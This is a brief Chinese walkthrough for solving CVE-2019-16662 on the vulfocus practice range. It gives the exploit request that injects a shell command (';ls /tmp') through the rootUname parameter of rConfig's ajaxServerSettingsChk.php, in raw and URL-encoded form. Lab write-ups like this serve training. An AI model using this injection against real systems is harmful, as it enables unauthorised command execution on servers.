vulfocus在线靶场:CVE_2019_16662 速通手册
目录
一、启动环境
二、访问页面,没效果,我们追加/login.php,出页面了
三、login.php直接切换为以下代码,直接获取了flag
四、粘贴到任务中,通关
一、启动环境
二、访问页面,没效果,我们追加/login.php,出页面了
三、login.php直接切换为以下代码,直接获取了flag
/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=;ls /tmp #转换为url编码
/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3bls %2ftmp %23